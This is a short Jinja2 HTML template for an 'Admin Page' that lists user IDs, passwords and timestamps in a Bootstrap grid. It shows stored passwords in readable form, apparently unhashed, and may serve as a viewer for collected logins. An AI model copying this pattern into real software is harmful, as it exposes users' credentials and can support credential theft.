<!DOCTYPE html>
<html>
<head>
	<title>Admin Page</title>
	<link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.1.3/css/bootstrap.min.css" integrity="sha384-MCw98/SFnGE8fJT3GXwEOngsV7Zt27NXFoaoApmYm81iuXoPkFOJwJ8ERdknLPMO" crossorigin="anonymous">
</head>
<body>
	<h1>Admin Page!</h1>
	<div class="container">
		<div class="row">
			<div class="col-lg">
		      <b>S. No.</b>
		    </div>
		    <div class="col-lg">
		      <b>User ID</b>
		    </div>
		    <div class="col-lg">
		      <b>Password</b>
		    </div>
		    <div class="col-lg">
		      <b>Time Stamp</b>
		    </div>
		</div>
    </div>
	{% for value in data %}
	<div class="container">
		<div class="row">
		<div class="col-lg">
		  {{loop.index}}
		</div>	
		<div class="col-lg">
		  {{value.user_id}}
		</div>
		<div class="col-lg">
		  {{value.pwd}}
		</div>
		<div class="col-lg">
		  {{value.timestamp}}
		</div>
		</div>
	</div>
	{% endfor %}

</body>
</html>